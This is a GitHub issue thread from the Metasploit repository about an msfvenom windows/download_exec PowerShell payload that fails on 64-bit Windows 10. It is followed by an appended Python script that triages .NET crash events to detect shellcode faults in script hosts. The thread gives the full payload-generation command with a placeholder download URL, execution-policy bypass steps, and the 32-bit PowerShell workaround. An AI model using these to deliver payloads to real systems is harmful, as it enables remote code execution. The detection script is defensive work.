rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

msfvenom -p windows/download_exec not working on 64bit / WOW64 #12876

Open klikevil opened 4 years ago

klikevil commented 4 years ago

Steps to reproduce

How'd you do it?

  1. ./msfvenom -p windows/download_exec --platform windows -a x86 -e cmd/powershell_base64 -f psh EXITFUNC=thread EXE='calc.exe' URL=https://yourserver/notepad.exe VERBOSE=true --out what-dle.ps1
  2. Run the output PowerShell script

Expected behavior

Download and execute of payload

Current behavior

Does not even download, leaves an error in event viewer (could potentially be related to .net framework?)

Application: powershell.exe Framework Version: v4.0.30319 Description: The process was terminated due to an unhandled exception. Exception Info: exception code c000001d, exception address 000002B75AA20006

System stuff

Metasploit version

$ git log -1 --pretty=oneline 7b7f56ec0449636deb96874415e1586b5f1e24fc (HEAD -> master, origin/master, origin/HEAD) automatic module_metadata_base.json update

I installed Metasploit with:

Installed in WSL with kali as distro

OS

What OS are you running Metasploit on?

Target payload: windows 10 (x64)
Payload generated under: WSL kali

We have symantec endpoint protection on as well, but the directory the payload is saved in is completely whitelisted.

Environment:

OS Information
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.17134 N/A Build 17134
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Workstation
OS Build Type:             Multiprocessor Free
Original Install Date:     4/22/2019, 9:47:53 AM
System Boot Time:          1/22/2020, 1:49:06 AM
System Manufacturer:       Dell Inc.
System Model:              Latitude 7490
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 142 Stepping 10 GenuineIntel ~1910 Mhz
BIOS Version:              Dell Inc. 1.7.2, 11/26/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     16,259 MB
Available Physical Memory: 8,027 MB
Virtual Memory: Max Size:  29,571 MB
Virtual Memory: Available: 16,284 MB
Virtual Memory: In Use:    13,287 MB
Page File Location(s):     C:\pagefile.sys
Hotfix(s):                 14 Hotfix(s) Installed.
Network Card(s):           13 NIC(s) Installed.
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
.NET framework information

CBS           : 1
Install       : 1
InstallPath   : C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
Release       : 528049
Servicing     : 0
TargetVersion : 4.0.0
Version       : 4.8.03761
PSPath        : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4
PSChildName   : Full
PSDrive       : HKLM
PSProvider

Installed software

Installed software list
klikevil commented 4 years ago

Side note:

psh-reflection doesn't seem to work either nor psh-cmd.

psh-reflection leaves the following message in event viewer:

Windows cannot access the file for one of the following reasons: there is a problem with the network connection, the disk that the file is stored on, or the storage drivers installed on this computer; or the disk is missing. Windows closed the program Windows PowerShell because of this error.

Program: Windows PowerShell
File:

The error value is listed in the Additional Data section.

User Action

  1. Open the file again. This situation might be a temporary problem that corrects itself when the program runs again.
  2. If the file still cannot be accessed and
    • It is on the network, your network administrator should verify that there is not a problem with the network and that the server can be contacted.
    • It is on a removable disk, for example, a floppy disk or CD-ROM, verify that the disk is fully inserted into the computer.
  3. Check and repair the file system by running CHKDSK. To run CHKDSK, click Start, click Run, type CMD, and then click OK. At the command prompt, type CHKDSK /F, and then press ENTER.
  4. If the problem persists, restore the file from a backup copy.
  5. Determine whether other files on the same disk can be opened. If not, the disk might be damaged. If it is a hard disk, contact your administrator or computer hardware vendor for further assistance.

Additional Data
Error value: 00000000
Disk type: 0

okoibraun commented 4 years ago

Try to see if you can set your system's PowerShell execution policy as follows:

  1. Go to a command prompt and type "powershell" w/o the surrounding quotes

You should then get the prompt displaying PS>

  2. Type Get-ExecutionPolicy

If it returns restricted, then continue with step 3; if it is not restricted, it simply means you're good

  3. Type Set-ExecutionPolicy AllSigned or Set-ExecutionPolicy ByPass

Then rerun your commands


klikevil commented 4 years ago


As my user:

PS C:\> Get-ExecutionPolicy
RemoteSigned
PS C:\>

I ran a prompt as administrator to try setting it and got the following:

Running set executionpolicy bypass as admin

PS C:\Windows\system32> Set-ExecutionPolicy ByPass

Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic at
https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes  [A] Yes to All  [N] No  [L] No to All  [S] Suspend  [?] Help (default is "N"): Y
Set-ExecutionPolicy : Windows PowerShell updated your execution policy successfully, but the setting is overridden by
a policy defined at a more specific scope. Due to the override, your shell will retain its current effective execution
policy of RemoteSigned. Type "Get-ExecutionPolicy -List" to view your execution policy settings. For more information
please see "Get-Help Set-ExecutionPolicy".
At line:1 char:1
+ Set-ExecutionPolicy ByPass
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (:) [Set-ExecutionPolicy], SecurityException
    + FullyQualifiedErrorId : ExecutionPolicyOverride,Microsoft.PowerShell.Commands.SetExecutionPolicyCommand

PS C:\Windows\system32>

Get-ExecutionPolicy -list

PS C:\Windows\system32> Get-ExecutionPolicy -List

        Scope ExecutionPolicy
        ----- ---------------
MachinePolicy    RemoteSigned
   UserPolicy       Undefined
      Process       Undefined
  CurrentUser       Undefined
 LocalMachine          Bypass

Still no success, it does not appear to download.

@space-r7 can you generate a PS1 payload that pulls notepad from somewhere? I'll gladly test that on this machine as well.

klikevil commented 4 years ago

I figured out what the issue is. download_exec can't become a 64 bit payload so it has to be run in C:\windows\syswow64\powershell\v1.0\powershell.exe . @space-r7 or @oripka or any moderators/etc can you mark this as feature request and change it to windows/download_exec x86_64 support
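The crash signature in the opening report (PowerShell terminated with exception code c000001d, STATUS_ILLEGAL_INSTRUCTION, at a 64-bit address) is the detail a defender would want to alert on: a script host does not execute native machine code of its own, and an illegal-instruction fault in a 64-bit PowerShell is exactly what the diagnosis above describes, a 32-bit payload loaded into a 64-bit host. The parser and triage rule below are an added example, not code from this issue or from Metasploit; the benign sample event, the SCRIPT_HOSTS set and the severity labels are assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Exception codes that mean native code faulted rather than a managed .NET exception.
# c000001d (STATUS_ILLEGAL_INSTRUCTION) is raised when the CPU is handed bytes it cannot
# decode, e.g. 32-bit shellcode executed inside a 64-bit process.
NATIVE_FAULT_CODES = {
    "c000001d": "STATUS_ILLEGAL_INSTRUCTION",
    "c0000005": "STATUS_ACCESS_VIOLATION",
    "c0000409": "STATUS_STACK_BUFFER_OVERRUN",
}
# The CLR reports an unhandled managed exception with this code; common and usually benign.
MANAGED_EXCEPTION_CODE = "e0434352"

# Script hosts that should never fault in native code on their own (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Shape of the ".NET Runtime" Application-log message (event 1026) quoted in the issue.
EVENT_RE = re.compile(
    r"Application:\s*(?P<app>\S+)\s+"
    r"Framework Version:\s*(?P<fw>\S+)\s+"
    r"Description:.*?"
    r"Exception Info:\s*exception code\s*(?P<code>[0-9a-fA-F]{8}),"
    r"\s*exception address\s*(?P<addr>[0-9a-fA-F]+)",
    re.DOTALL,
)

# Event text quoted in the issue report above.
PAGE_EVENT = (
    "Application: powershell.exe Framework Version: v4.0.30319 Description: The process was "
    "terminated due to an unhandled exception. Exception Info: exception code c000001d, "
    "exception address 000002B75AA20006"
)
# Constructed benign event: an ordinary managed exception in some line-of-business app.
CONSTRUCTED_BENIGN_EVENT = (
    "Application: ReportViewer.exe Framework Version: v4.0.30319 Description: The process was "
    "terminated due to an unhandled exception. Exception Info: exception code e0434352, "
    "exception address 00007FFB1A2B3C4D"
)


@dataclass
class NetRuntimeCrash:
    application: str
    framework: str
    code: str       # 8 hex digits, lower case
    address: str    # hex, lower case


def parse_event(text: str) -> Optional[NetRuntimeCrash]:
    """Extract the fields of a .NET Runtime crash message; None if the text is some other event."""
    m = EVENT_RE.search(text)
    if not m:
        return None
    return NetRuntimeCrash(m["app"].lower(), m["fw"], m["code"].lower(), m["addr"].lower())


def address_width(addr: str) -> int:
    """Process bitness implied by the faulting address: anything above 0xFFFFFFFF is a 64-bit process."""
    return 64 if int(addr, 16) > 0xFFFFFFFF else 32


def assess(crash: NetRuntimeCrash) -> Tuple[str, str]:
    """Return (severity, reason) for one crash record."""
    if crash.code == MANAGED_EXCEPTION_CODE:
        return "info", "unhandled managed exception"
    name = NATIVE_FAULT_CODES.get(crash.code)
    if name is None:
        return "low", f"unrecognised exception code {crash.code}"
    if crash.application in SCRIPT_HOSTS:
        reason = f"{name} inside script host {crash.application}: native code ran in the interpreter"
        if name == "STATUS_ILLEGAL_INSTRUCTION" and address_width(crash.address) == 64:
            reason += "; 64-bit fault address, consistent with 32-bit shellcode loaded into a 64-bit host"
        return "high", reason
    return "medium", f"{name} in {crash.application}"


def triage(events: List[str]) -> List[Tuple[str, str, str]]:
    """Parse and assess a batch of event messages, skipping ones that are not crash records."""
    results = []
    for text in events:
        crash = parse_event(text)
        if crash is not None:
            severity, reason = assess(crash)
            results.append((severity, crash.application, reason))
    return results


if __name__ == "__main__":
    for severity, app, reason in triage([PAGE_EVENT, CONSTRUCTED_BENIGN_EVENT, "unrelated text"]):
        print(f"[{severity}] {app}: {reason}")
```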